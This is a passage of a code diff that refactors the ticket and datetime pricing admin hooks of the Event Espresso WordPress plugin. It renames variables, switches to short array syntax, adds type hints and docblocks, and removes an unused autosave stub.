-                    $tkt,
+                    $ticket_data,
                     $data
                 );
             } else {
-                // add tkt to saved tkts
+                // add ticket to saved tickets
                 $saved_tickets[ $ticket->ID() ] = $ticket;
                 do_action(
                     'AHEE__espresso_events_Pricing_Hooks___update_tkts_update_ticket',
                     $ticket,
                     $row,
-                    $tkt,
+                    $ticket_data,
                     $data
                 );
             }
@@ -702,35 +695,35 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         // (i.e. autosaves are happening and then in between autosaves the user trashes a ticket).
         // Or a draft event was saved and in the process of editing a ticket is trashed.
         // No sense in keeping all the related data in the db!
-        $old_tickets = isset($old_tickets[0]) && $old_tickets[0] === '' ? array() : $old_tickets;
+        $old_tickets     = isset($old_tickets[0]) && $old_tickets[0] === '' ? [] : $old_tickets;
         $tickets_removed = array_diff($old_tickets, array_keys($saved_tickets));
         foreach ($tickets_removed as $id) {
             $id = absint($id);
             // get the ticket for this id
-            $tkt_to_remove = EE_Registry::instance()->load_model('Ticket')->get_one_by_ID($id);
-            // if this tkt is a default tkt we leave it alone cause it won't be attached to the datetime
-            if ($tkt_to_remove->get('TKT_is_default')) {
+            $ticket_to_remove = EE_Registry::instance()->load_model('Ticket')->get_one_by_ID($id);
+            // if this ticket is a default ticket we leave it alone cause it won't be attached to the datetime
+            if ($ticket_to_remove->get('TKT_is_default')) {
                 continue;
             }
-            // if this tkt has any registrations attached so then we just ARCHIVE
+            // if this ticket has any registrations attached so then we just ARCHIVE
             // because we don't actually permanently delete these tickets.
-            if ($tkt_to_remove->count_related('Registration') > 0) {
-                $tkt_to_remove->delete();
+            if ($ticket_to_remove->count_related('Registration') > 0) {
+                $ticket_to_remove->delete();
                 continue;
             }
             // need to get all the related datetimes on this ticket and remove from every single one of them
-            // (remember this process can ONLY kick off if there are NO tkts_sold)
-            $datetimes = $tkt_to_remove->get_many_related('Datetime');
+            // (remember this process can ONLY kick off if there are NO tickets_sold)
+            $datetimes = $ticket_to_remove->get_many_related('Datetime');
             foreach ($datetimes as $datetime) {
-                $tkt_to_remove->_remove_relation_to($datetime, 'Datetime');
+                $ticket_to_remove->_remove_relation_to($datetime, 'Datetime');
             }
             // need to do the same for prices (except these prices can also be deleted because again,
             // tickets can only be trashed if they don't have any TKTs sold (otherwise they are just archived))
-            $tkt_to_remove->delete_related_permanently('Price');
-            do_action('AHEE__espresso_events_Pricing_Hooks___update_tkts_delete_ticket', $tkt_to_remove);
+            $ticket_to_remove->delete_related_permanently('Price');
+            do_action('AHEE__espresso_events_Pricing_Hooks___update_tkts_delete_ticket', $ticket_to_remove);
             // finally let's delete this ticket
             // (which should not be blocked at this point b/c we've removed all our relationships)
-            $tkt_to_remove->delete_permanently();
+            $ticket_to_remove->delete_permanently();
         }
         return $saved_tickets;
     }
@@ -738,25 +731,25 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
 
     /**
      * @access  protected
-     * @param EE_Ticket      $ticket
-     * @param \EE_Datetime[] $saved_datetimes
-     * @param \EE_Datetime[] $added_datetimes
-     * @param \EE_Datetime[] $removed_datetimes
+     * @param EE_Ticket     $ticket
+     * @param EE_Datetime[] $saved_datetimes
+     * @param int[]         $added_datetimes
+     * @param int[]         $removed_datetimes
      * @return EE_Ticket
      * @throws EE_Error
+     * @throws ReflectionException
      */
     protected function _update_ticket_datetimes(
         EE_Ticket $ticket,
-        $saved_datetimes = array(),
-        $added_datetimes = array(),
-        $removed_datetimes = array()
-    ) {
+        array $saved_datetimes = [],
+        array $added_datetimes = [],
+        array $removed_datetimes = []
+    ): EE_Ticket {
         // to start we have to add the ticket to all the datetimes its supposed to be with,
         // and removing the ticket from datetimes it got removed from.
         // first let's add datetimes
         if (! empty($added_datetimes) && is_array($added_datetimes)) {
             foreach ($added_datetimes as $row_id) {
-                $row_id = (int) $row_id;
                 if (isset($saved_datetimes[ $row_id ]) && $saved_datetimes[ $row_id ] instanceof EE_Datetime) {
                     $ticket->_add_relation_to($saved_datetimes[ $row_id ], 'Datetime');
                 }
@@ -765,9 +758,8 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         // then remove datetimes
         if (! empty($removed_datetimes) && is_array($removed_datetimes)) {
             foreach ($removed_datetimes as $row_id) {
-                $row_id = (int) $row_id;
                 // its entirely possible that a datetime got deleted (instead of just removed from relationship.
-                // So make sure we skip over this if the dtt isn't in the $saved_datetimes array)
+                // So make sure we skip over this if the datetime isn't in the $saved_datetimes array)
                 if (isset($saved_datetimes[ $row_id ]) && $saved_datetimes[ $row_id ] instanceof EE_Datetime) {
                     $ticket->_remove_relation_to($saved_datetimes[ $row_id ], 'Datetime');
                 }
@@ -783,8 +775,8 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @access  protected
      * @param EE_Ticket $ticket
      * @param array     $price_rows
-     * @param int       $ticket_price
-     * @param int       $base_price
+     * @param int|float $ticket_price
+     * @param int|float $base_price
      * @param int       $base_price_id
      * @return EE_Ticket
      * @throws ReflectionException
@@ -795,11 +787,11 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      */
     protected function _duplicate_ticket(
         EE_Ticket $ticket,
-        $price_rows = array(),
+        array $price_rows = [],
         $ticket_price = 0,
         $base_price = 0,
-        $base_price_id = 0
-    ) {
+        int $base_price_id = 0
+    ): EE_Ticket {
         // create new ticket that's a copy of the existing
         // except a new id of course (and not archived)
         // AND has the new TKT_price associated with it.
@@ -812,7 +804,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         $new_ticket->save();
         // we also need to make sure this new ticket gets the same datetime attachments as the archived ticket
         $datetimes_on_existing = $ticket->datetimes();
-        $new_ticket = $this->_update_ticket_datetimes(
+        $new_ticket            = $this->_update_ticket_datetimes(
             $new_ticket,
             $datetimes_on_existing,
             array_keys($datetimes_on_existing)
@@ -827,14 +819,13 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         // now we update the prices just for this ticket
         $new_ticket = $this->_add_prices_to_ticket($price_rows, $new_ticket, true);
         // and we update the base price
-        $new_ticket = $this->_add_prices_to_ticket(
-            array(),
+        return $this->_add_prices_to_ticket(
+            [],
             $new_ticket,
             true,
             $base_price,
             $base_price_id
         );
-        return $new_ticket;
     }
 
 
@@ -863,24 +854,24 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         bool $new_prices = false,
         $base_price = false,
         $base_price_id = false
-    ) {
+    ): EE_Ticket {
         // let's just get any current prices that may exist on the given ticket
         // so we can remove any prices that got trashed in this session.
         $current_prices_on_ticket = $base_price !== false
             ? $ticket->base_price(true)
             : $ticket->price_modifiers();
-        $updated_prices = array();
+        $updated_prices           = [];
         // if $base_price ! FALSE then updating a base price.
         if ($base_price !== false) {
-            $prices[1] = array(
+            $prices[1] = [
                 'PRC_ID'     => $new_prices || $base_price_id === 1 ? null : $base_price_id,
                 'PRT_ID'     => 1,
                 'PRC_amount' => $base_price,
                 'PRC_name'   => $ticket->get('TKT_name'),
                 'PRC_desc'   => $ticket->get('TKT_description'),
-            );
+            ];
         }
-        // possibly need to save tkt
+        // possibly need to save ticket
         if (! $ticket->ID()) {
             $ticket->save();
         }
@@ -889,7 +880,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             if (empty($prt_id)) {
                 continue;
             } //prices MUST have a price type id.
-            $PRC_values = array(
+            $PRC_values = [
                 'PRC_ID'         => ! empty($prc['PRC_ID']) ? $prc['PRC_ID'] : null,
                 'PRT_ID'         => $prt_id,
                 'PRC_amount'     => ! empty($prc['PRC_amount']) ? $prc['PRC_amount'] : 0,
@@ -898,12 +889,12 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 'PRC_is_default' => false,
                 // make sure we set PRC_is_default to false for all ticket saves from event_editor
                 'PRC_order'      => $row,
-            );
+            ];
             if ($new_prices || empty($PRC_values['PRC_ID'])) {
                 $PRC_values['PRC_ID'] = 0;
-                $price = EE_Registry::instance()->load_class(
+                $price                = EE_Registry::instance()->load_class(
                     'Price',
-                    array($PRC_values),
+                    [$PRC_values],
                     false,
                     false
                 );
@@ -920,8 +911,8 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         }
         // now let's remove any prices that got removed from the ticket
         if (! empty($current_prices_on_ticket)) {
-            $current = array_keys($current_prices_on_ticket);
-            $updated = array_keys($updated_prices);
+            $current          = array_keys($current_prices_on_ticket);
+            $updated          = array_keys($updated_prices);
             $prices_to_remove = array_diff($current, $updated);
             if (! empty($prices_to_remove)) {
                 foreach ($prices_to_remove as $prc_id) {
@@ -937,38 +928,6 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
 
 
     /**
-     * @param Events_Admin_Page $event_admin_obj
-     * @return Events_Admin_Page
-     */
-    public function autosave_handling(Events_Admin_Page $event_admin_obj)
-    {
-        return $event_admin_obj;
-        // doing nothing for the moment.
-        // todo when I get to this remember that I need to set the template args on the $event_admin_obj
-        // (use the set_template_args() method)
-        /**
-         * need to remember to handle TICKET DEFAULT saves correctly:  I've got two input fields in the dom:
-         * 1. TKT_is_default_selector (visible)
-         * 2. TKT_is_default (hidden)
-         * I think we'll use the TKT_is_default for recording whether the ticket displayed IS a default ticket
-         * (on new event creations). Whereas the TKT_is_default_selector is for the user to indicate they want
-         * this ticket to be saved as a default.
-         * The tricky part is, on an initial display on create or edit (or after manually updating),
-         * the TKT_is_default_selector will always be unselected and the TKT_is_default will only be true
-         * if this is a create.  However, after an autosave, users will want some sort of indicator that
-         * the TKT HAS been saved as a default..
-         * in other words we don't want to remove the check on TKT_is_default_selector. So here's what I'm thinking.
-         * On Autosave:
-         * 1. If TKT_is_default is true: we create a new TKT, send back the new id and add id to related elements,
-         * then set the TKT_is_default to false.
-         * 2. If TKT_is_default_selector is true: we create/edit existing ticket (following conditions above as well).
-         *  We do NOT create a new default ticket.  The checkbox stays selected after autosave.
-         * 3. only on MANUAL update do we check for the selection and if selected create the new default ticket.
-         */
-    }
-
-
-    /**
      * @throws ReflectionException
      * @throws InvalidArgumentException
      * @throws InvalidInterfaceException
@@ -978,53 +937,47 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      */
     public function pricing_metabox()
     {
-        $existing_datetime_ids = $existing_ticket_ids = $datetime_tickets = $ticket_datetimes = array();
-        $event = $this->_adminpage_obj->get_cpt_model_obj();
+        $existing_datetime_ids = $existing_ticket_ids = $datetime_tickets = $ticket_datetimes = [];
+        $event                 = $this->_adminpage_obj->get_cpt_model_obj();
+
         // set is_creating_event property.
-        $EVT_ID = $event->ID();
+        $EVT_ID                   = $event->ID();
         $this->_is_creating_event = empty($this->_req_data['post']);
+
         // default main template args
-        $main_template_args = array(
+        $main_template_args = [
             'event_datetime_help_link' => EEH_Template::get_help_tab_link(
                 'event_editor_event_datetimes_help_tab',
                 $this->_adminpage_obj->page_slug,
-                $this->_adminpage_obj->get_req_action(),
-                false,
-                false
+                $this->_adminpage_obj->get_req_action()
             ),
+
             // todo need to add a filter to the template for the help text
             // in the Events_Admin_Page core file so we can add further help
-            'existing_datetime_ids'    => '',
-            'total_dtt_rows'           => 1,
             'add_new_dtt_help_link'    => EEH_Template::get_help_tab_link(
                 'add_new_dtt_info',
                 $this->_adminpage_obj->page_slug,
-                $this->_adminpage_obj->get_req_action(),
-                false,
-                false
+                $this->_adminpage_obj->get_req_action()
             ),
             // todo need to add this help info id to the Events_Admin_Page core file so we can access it here.
             'datetime_rows'            => '',
             'show_tickets_container'   => '',
-            // $this->_adminpage_obj->get_cpt_model_obj()->ID() > 1 ? ' style="display:none;"' : '',
             'ticket_rows'              => '',
-            'existing_ticket_ids'      => '',
-            'total_ticket_rows'        => 1,
-            'ticket_js_structure'      => '',
-            'ee_collapsible_status'    => ' ee-collapsible-open'
-            // $this->_adminpage_obj->get_cpt_model_obj()->ID() > 0 ? ' ee-collapsible-closed' : ' ee-collapsible-open'
-        );
-        $timezone = $event instanceof EE_Event ? $event->timezone_string() : null;
+            'ee_collapsible_status'    => ' ee-collapsible-open',
+        ];
+        $timezone           = $event instanceof EE_Event ? $event->timezone_string() : null;
         do_action('AHEE_log', __FILE__, __FUNCTION__, '');
+
         /**
          * 1. Start with retrieving Datetimes
          * 2. For each datetime get related tickets
          * 3. For each ticket get related prices
          */
         /** @var EEM_Datetime $datetime_model */
-        $datetime_model = EE_Registry::instance()->load_model('Datetime', array($timezone));
-        $datetimes = $datetime_model->get_all_event_dates($EVT_ID);
+        $datetime_model                       = EE_Registry::instance()->load_model('Datetime', [$timezone]);
+        $datetimes                            = $datetime_model->get_all_event_dates($EVT_ID);
         $main_template_args['total_dtt_rows'] = count($datetimes);
+
         /**
          * @see https://events.codebasehq.com/projects/event-espresso/tickets/9486
          * for why we are counting $datetime_row and then setting that on the Datetime object
@@ -1038,26 +991,26 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             $related_tickets = $datetime->ID() > 0
                 ? $datetime->get_many_related(
                     'Ticket',
-                    array(
-                        array(
-                            'OR' => array('TKT_deleted' => 1, 'TKT_deleted*' => 0),
-                        ),
+                    [
+                        [
+                            'OR' => ['TKT_deleted' => 1, 'TKT_deleted*' => 0],
+                        ],
                         'default_where_conditions' => 'none',
-                        'order_by'                 => array('TKT_order' => 'ASC'),
-                    )
+                        'order_by'                 => ['TKT_order' => 'ASC'],
+                    ]
                 )
-                : array();
-            // if there are no related tickets this is likely a new event OR autodraft
+                : [];
+            // if there are no related tickets this is likely a new event OR auto-draft
             // event so we need to generate the default tickets because datetimes
             // ALWAYS have at least one related ticket!!.  EXCEPT, we dont' do this if there is already more than one
             // datetime on the event.
             if (empty($related_tickets) && count($datetimes) < 2) {
                 /** @var EEM_Ticket $ticket_model */
-                $ticket_model = EE_Registry::instance()->load_model('Ticket');
+                $ticket_model    = EE_Registry::instance()->load_model('Ticket');
                 $related_tickets = $ticket_model->get_all_default_tickets();
                 // this should be ordered by TKT_ID, so let's grab the first default ticket
                 // (which will be the main default) and ensure it has any default prices added to it (but do NOT save).
-                $default_prices = EEM_Price::instance()->get_all_default_prices();
+                $default_prices      = EEM_Price::instance()->get_all_default_prices();
                 $main_default_ticket = reset($related_tickets);
                 if ($main_default_ticket instanceof EE_Ticket) {
                     foreach ($default_prices as $default_price) {
@@ -1073,12 +1026,12 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             // So we're going to temporarily cache some of that information.
             // loop through and setup the ticket rows and make sure the order is set.
             foreach ($related_tickets as $ticket) {
-                $TKT_ID = $ticket->get('TKT_ID');
+                $TKT_ID     = $ticket->get('TKT_ID');
                 $ticket_row = $ticket->get('TKT_row');
                 // we only want unique tickets in our final display!!
                 if (! in_array($TKT_ID, $existing_ticket_ids, true)) {
                     $existing_ticket_ids[] = $TKT_ID;
-                    $all_tickets[] = $ticket;
+                    $all_tickets[]         = $ticket;
                 }
                 // temporary cache of this ticket info for this datetime for later processing of datetime rows.
                 $datetime_tickets[ $DTT_ID ][] = $ticket_row;
@@ -1092,8 +1045,8 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             }
             $datetime_row++;
         }
-        $main_template_args['total_ticket_rows'] = count($existing_ticket_ids);
-        $main_template_args['existing_ticket_ids'] = implode(',', $existing_ticket_ids);
+        $main_template_args['total_ticket_rows']     = count($existing_ticket_ids);
+        $main_template_args['existing_ticket_ids']   = implode(',', $existing_ticket_ids);
         $main_template_args['existing_datetime_ids'] = implode(',', $existing_datetime_ids);
         // sort $all_tickets by order
         usort(
@@ -1107,8 +1060,8 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 return ($a_order < $b_order) ? -1 : 1;
             }
         );
-        // k NOW we have all the data we need for setting up the dtt rows
-        // and ticket rows so we start our dtt loop again.
+        // k NOW we have all the data we need for setting up the datetime rows
+        // and ticket rows so we start our datetime loop again.
         $datetime_row = 1;
         foreach ($datetimes as $datetime) {
             $main_template_args['datetime_rows'] .= $this->_get_datetime_row(
@@ -1136,9 +1089,10 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         }
         $main_template_args['ticket_js_structure'] = $this->_get_ticket_js_structure($datetimes, $all_tickets);
 
-        $status_change_notice = EventEspresso\core\services\loaders\LoaderFactory::getLoader()->getShared(
+        $status_change_notice = LoaderFactory::getLoader()->getShared(
             'EventEspresso\core\domain\services\admin\notices\status_change\StatusChangeNotice'
         );
+
         $main_template_args['status_change_notice'] = $status_change_notice->display(
             '__event-editor',
             'espresso-events'
@@ -1158,60 +1112,64 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @param array       $all_tickets
      * @param bool        $default
      * @param array       $all_datetimes
-     * @return mixed
+     * @return string
      * @throws DomainException
      * @throws EE_Error
+     * @throws ReflectionException
      */
     protected function _get_datetime_row(
-        $datetime_row,
+        int $datetime_row,
         EE_Datetime $datetime,
-        $datetime_tickets = array(),
-        $all_tickets = array(),
-        $default = false,
-        $all_datetimes = array()
-    ) {
-        $dtt_display_template_args = array(
-            'dtt_edit_row'             => $this->_get_dtt_edit_row(
-                $datetime_row,
-                $datetime,
-                $default,
-                $all_datetimes
-            ),
-            'dtt_attached_tickets_row' => $this->_get_dtt_attached_tickets_row(
-                $datetime_row,
-                $datetime,
-                $datetime_tickets,
-                $all_tickets,
-                $default
-            ),
-            'dtt_row'                  => $default ? 'DTTNUM' : $datetime_row,
-        );
+        array $datetime_tickets = [],
+        array $all_tickets = [],
+        bool $default = false,
+        array $all_datetimes = []
+    ): string {
         return EEH_Template::display_template(
             PRICING_TEMPLATE_PATH . 'event_tickets_datetime_row_wrapper.template.php',
-            $dtt_display_template_args,
+            [
+                'dtt_edit_row'             => $this->_get_dtt_edit_row(
+                    $datetime_row,
+                    $datetime,
+                    $default,
+                    $all_datetimes
+                ),
+                'dtt_attached_tickets_row' => $this->_get_dtt_attached_tickets_row(
+                    $datetime_row,
+                    $datetime,
+                    $datetime_tickets,
+                    $all_tickets,
+                    $default
+                ),
+                'dtt_row'                  => $default ? 'DTTNUM' : $datetime_row,
+            ],
             true
         );
     }
 
 
     /**
-     * This method is used to generate a dtt fields  edit row.
+     * This method is used to generate a datetime fields  edit row.
      * The same row is used to generate a row with valid DTT objects
      * and the default row that is used as the skeleton by the js.
      *
-     * @param int           $datetime_row  The row number for the row being generated.
-     * @param EE_Datetime   $datetime
-     * @param bool          $default       Whether a default row is being generated or not.
-     * @param EE_Datetime[] $all_datetimes This is the array of all datetimes used in the editor.
+     * @param int              $datetime_row  The row number for the row being generated.
+     * @param EE_Datetime|null $datetime
+     * @param bool             $default       Whether a default row is being generated or not.
+     * @param EE_Datetime[]    $all_datetimes This is the array of all datetimes used in the editor.
      * @return string
-     * @throws DomainException
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    protected function _get_dtt_edit_row($datetime_row, $datetime, $default, $all_datetimes)
-    {
+    protected function _get_dtt_edit_row(
+        int $datetime_row,
+        ?EE_Datetime $datetime,
+        bool $default,
+        array $all_datetimes
+    ): string {
         // if the incoming $datetime object is NOT an instance of EE_Datetime then force default to true.
-        $default = ! $datetime instanceof EE_Datetime ? true : $default;
-        $template_args = array(
+        $default                     = ! $datetime instanceof EE_Datetime ? true : $default;
+        $template_args               = [
             'dtt_row'              => $default ? 'DTTNUM' : $datetime_row,
             'event_datetimes_name' => $default ? 'DTTNAMEATTR' : 'edit_event_datetimes',
             'edit_dtt_expanded'    => '',
@@ -1235,13 +1193,13 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             'trash_icon'           => ! empty($datetime) && $datetime->get('DTT_sold') > 0
                 ? 'dashicons dashicons-lock'
                 : 'trash-icon dashicons dashicons-post-trash clickable',
-            'reg_list_url'         => $default || ! $datetime->event() instanceof \EE_Event
+            'reg_list_url'         => $default || ! $datetime->event() instanceof EE_Event
                 ? ''
                 : EE_Admin_Page::add_query_args_and_nonce(
-                    array('event_id' => $datetime->event()->ID(), 'datetime_id' => $datetime->ID()),
+                    ['event_id' => $datetime->event()->ID(), 'datetime_id' => $datetime->ID()],
                     REG_ADMIN_URL
                 ),
-        );
+        ];
         $template_args['show_trash'] = count($all_datetimes) === 1
                                        && $template_args['trash_icon'] !== 'dashicons dashicons-lock'
             ? 'display:none'
@@ -1270,18 +1228,19 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @param array       $datetime_tickets
      * @param array       $all_tickets
      * @param bool        $default
-     * @return mixed
+     * @return string
      * @throws DomainException
      * @throws EE_Error
+     * @throws ReflectionException
      */
     protected function _get_dtt_attached_tickets_row(
-        $datetime_row,
-        $datetime,
-        $datetime_tickets = array(),
-        $all_tickets = array(),
-        $default = false
-    ) {
-        $template_args = array(
+        int $datetime_row,
+        EE_Datetime $datetime,
+        array $datetime_tickets = [],
+        array $all_tickets = [],
+        bool $default = false
+    ): string {
+        $template_args = [
             'dtt_row'                           => $default ? 'DTTNUM' : $datetime_row,
             'event_datetimes_name'              => $default ? 'DTTNAMEATTR' : 'edit_event_datetimes',
             'DTT_description'                   => $default ? '' : $datetime->get_f('DTT_description'),
@@ -1290,13 +1249,11 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             'add_new_datetime_ticket_help_link' => EEH_Template::get_help_tab_link(
                 'add_new_ticket_via_datetime',
                 $this->_adminpage_obj->page_slug,
-                $this->_adminpage_obj->get_req_action(),
-                false,
-                false
+                $this->_adminpage_obj->get_req_action()
             ),
             // todo need to add this help info id to the Events_Admin_Page core file so we can access it here.
             'DTT_ID'                            => $default ? '' : $datetime->ID(),
-        );
+        ];
         // need to setup the list items (but only if this isn't a default skeleton setup)
         if (! $default) {
             $ticket_row = 1;
@@ -1332,40 +1289,40 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
 
 
     /**
-     * @param int         $datetime_row
-     * @param int         $ticket_row
-     * @param EE_Datetime $datetime
-     * @param EE_Ticket   $ticket
-     * @param array       $datetime_tickets
-     * @param bool        $default
-     * @return mixed
-     * @throws DomainException
+     * @param int              $datetime_row
+     * @param int              $ticket_row
+     * @param EE_Datetime|null $datetime
+     * @param EE_Ticket|null   $ticket
+     * @param array            $datetime_tickets
+     * @param bool             $default
+     * @return string
      * @throws EE_Error
+     * @throws ReflectionException
      */
     protected function _get_datetime_tickets_list_item(
-        $datetime_row,
-        $ticket_row,
-        $datetime,
-        $ticket,
-        $datetime_tickets = array(),
-        $default = false
-    ) {
-        $dtt_tkts = $datetime instanceof EE_Datetime && isset($datetime_tickets[ $datetime->ID() ])
+        int $datetime_row,
+        int $ticket_row,
+        ?EE_Datetime $datetime,
+        ?EE_Ticket $ticket,
+        array $datetime_tickets = [],
+        bool $default = false
+    ): string {
+        $datetime_tickets = $datetime instanceof EE_Datetime && isset($datetime_tickets[ $datetime->ID() ])
             ? $datetime_tickets[ $datetime->ID() ]
-            : array();
-        $display_row = $ticket instanceof EE_Ticket ? $ticket->get('TKT_row') : 0;
-        $no_ticket = $default && empty($ticket);
-        $template_args = array(
+            : [];
+        $display_row      = $ticket instanceof EE_Ticket ? $ticket->get('TKT_row') : 0;
+        $no_ticket        = $default && empty($ticket);
+        $template_args    = [
             'dtt_row'                 => $default
                 ? 'DTTNUM'
                 : $datetime_row,
             'tkt_row'                 => $no_ticket
                 ? 'TICKETNUM'
                 : $ticket_row,
-            'datetime_ticket_checked' => in_array($display_row, $dtt_tkts, true)
+            'datetime_ticket_checked' => in_array($display_row, $datetime_tickets, true)
                 ? ' checked'
                 : '',
-            'ticket_selected'         => in_array($display_row, $dtt_tkts, true)
+            'ticket_selected'         => in_array($display_row, $datetime_tickets, true)
                 ? ' ticket-selected'
                 : '',
             'TKT_name'                => $no_ticket
@@ -1374,7 +1331,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             'tkt_status_class'        => $no_ticket || $this->_is_creating_event
                 ? ' tkt-status-' . EE_Ticket::onsale
                 : ' tkt-status-' . $ticket->ticket_status(),
-        );
+        ];
         // filter template args
         $template_args = apply_filters(
             'FHEE__espresso_events_Pricing_Hooks___get_datetime_tickets_list_item__template_args',
@@ -1400,15 +1357,15 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * This same method is used to generate both the actual rows and the js skeleton row
      * (when default === true)
      *
-     * @param int           $ticket_row       Represents the row number being generated.
-     * @param               $ticket
-     * @param EE_Datetime[] $ticket_datetimes Either an array of all datetimes on all tickets indexed by each ticket
-     *                                        or empty for default
-     * @param EE_Datetime[] $all_datetimes    All Datetimes on the event or empty for default.
-     * @param bool          $default          Whether default row being generated or not.
-     * @param EE_Ticket[]   $all_tickets      This is an array of all tickets attached to the event
-     *                                        (or empty in the case of defaults)
-     * @return mixed
+     * @param int            $ticket_row       Represents the row number being generated.
+     * @param EE_Ticket|null $ticket
+     * @param EE_Datetime[]  $ticket_datetimes Either an array of all datetimes on all tickets indexed by each ticket
+     *                                         or empty for default
+     * @param EE_Datetime[]  $all_datetimes    All Datetimes on the event or empty for default.
+     * @param bool           $default          Whether default row being generated or not.
+     * @param EE_Ticket[]    $all_tickets      This is an array of all tickets attached to the event
+     *                                         (or empty in the case of defaults)
+     * @return string
      * @throws InvalidArgumentException
      * @throws InvalidInterfaceException
      * @throws InvalidDataTypeException
@@ -1417,21 +1374,21 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
      * @throws ReflectionException
      */
     protected function _get_ticket_row(
-        $ticket_row,
-        $ticket,
-        $ticket_datetimes,
-        $all_datetimes,
-        $default = false,
-        $all_tickets = array()
-    ) {
+        int $ticket_row,
+        ?EE_Ticket $ticket,
+        array $ticket_datetimes,
+        array $all_datetimes,
+        bool $default = false,
+        array $all_tickets = []
+    ): string {
         // if $ticket is not an instance of EE_Ticket then force default to true.
         $default = ! $ticket instanceof EE_Ticket ? true : $default;
-        $prices = ! empty($ticket) && ! $default
+        $prices  = ! empty($ticket) && ! $default
             ? $ticket->get_many_related(
                 'Price',
-                array('default_where_conditions' => 'none', 'order_by' => array('PRC_order' => 'ASC'))
+                ['default_where_conditions' => 'none', 'order_by' => ['PRC_order' => 'ASC']]
             )
-            : array();
+            : [];
         // if there is only one price (which would be the base price)
         // or NO prices and this ticket is a default ticket,
         // let's just make sure there are no cached default prices on the object.
@@ -1443,12 +1400,12 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         // we don't want any starting_ticket_datetime_row values set
         // (otherwise there won't be any new relationships created for tickets based off of the default ticket).
         // This will future proof in case there is ever any behaviour change between what the primary_key defaults to.
-        $default_dtt = $default || ($ticket instanceof EE_Ticket && $ticket->is_default());
-        $tkt_datetimes = $ticket instanceof EE_Ticket && isset($ticket_datetimes[ $ticket->ID() ])
+        $default_datetime = $default || ($ticket instanceof EE_Ticket && $ticket->is_default());
+        $ticket_datetimes = $ticket instanceof EE_Ticket && isset($ticket_datetimes[ $ticket->ID() ])
             ? $ticket_datetimes[ $ticket->ID() ]
-            : array();
-        $ticket_subtotal = $default ? 0 : $ticket->get_ticket_subtotal();
-        $base_price = $default ? null : $ticket->base_price();
+            : [];
+        $ticket_subtotal  = $default ? 0 : $ticket->get_ticket_subtotal();
+        $base_price       = $default ? null : $ticket->base_price();
         $count_price_mods = EEM_Price::instance()->get_all_default_prices(true);
         // breaking out complicated condition for ticket_status
         if ($default) {
@@ -1481,7 +1438,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 $TKT_min = '';
             }
         }
-        $template_args = array(
+        $template_args                 = [
             'tkt_row'                       => $default ? 'TICKETNUM' : $ticket_row,
             'TKT_order'                     => $default ? 'TICKETNUM' : $ticket_row,
             // on initial page load this will always be the correct order.
@@ -1519,19 +1476,19 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             'TKT_max'                       => $default
                 ? ''
                 : $ticket->get_pretty('TKT_max', 'input'),
-            'TKT_sold'                      => $default ? 0 : $ticket->tickets_sold('ticket'),
+            'TKT_sold'                      => $default ? 0 : $ticket->tickets_sold(),
             'TKT_reserved'                  => $default ? 0 : $ticket->reserved(),
             'TKT_registrations'             => $default
                 ? 0
                 : $ticket->count_registrations(
-                    array(
-                        array(
-                            'STS_ID' => array(
+                    [
+                        [
+                            'STS_ID' => [
                                 '!=',
                                 EEM_Registration::status_id_incomplete,
-                            ),
-                        ),
-                    )
+                            ],
+                        ],
+                    ]
                 ),
             'TKT_ID'                        => $default ? 0 : $ticket->ID(),
             'TKT_description'               => $default ? '' : $ticket->get_f('TKT_description'),
@@ -1553,8 +1510,8 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
                 : '',
             'total_price_rows'              => count($prices) > 1 ? count($prices) : 1,
             'ticket_datetimes_list'         => $default ? '<li class="hidden"></li>' : '',
-            'starting_ticket_datetime_rows' => $default || $default_dtt ? '' : implode(',', $tkt_datetimes),
-            'ticket_datetime_rows'          => $default ? '' : implode(',', $tkt_datetimes),
+            'starting_ticket_datetime_rows' => $default || $default_datetime ? '' : implode(',', $ticket_datetimes),
+            'ticket_datetime_rows'          => $default ? '' : implode(',', $ticket_datetimes),
             'existing_ticket_price_ids'     => $default ? '' : implode(',', array_keys($prices)),
             'ticket_template_id'            => $default ? 0 : $ticket->get('TTM_ID'),
             'TKT_taxable'                   => $TKT_taxable,
@@ -1581,7 +1538,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
             'clone_icon'                    => $ticket instanceof EE_Ticket && $ticket->deleted()
                 ? ''
                 : 'clone-icon ee-icon ee-icon-clone clickable',
-        );
+        ];
         $template_args['trash_hidden'] = count($all_tickets) === 1
                                          && $template_args['trash_icon'] !== 'dashicons dashicons-lock'
             ? 'display:none'
@@ -1589,7 +1546,7 @@ class espresso_events_Pricing_Hooks extends EE_Admin_Hooks
         // handle rows that should NOT be empty
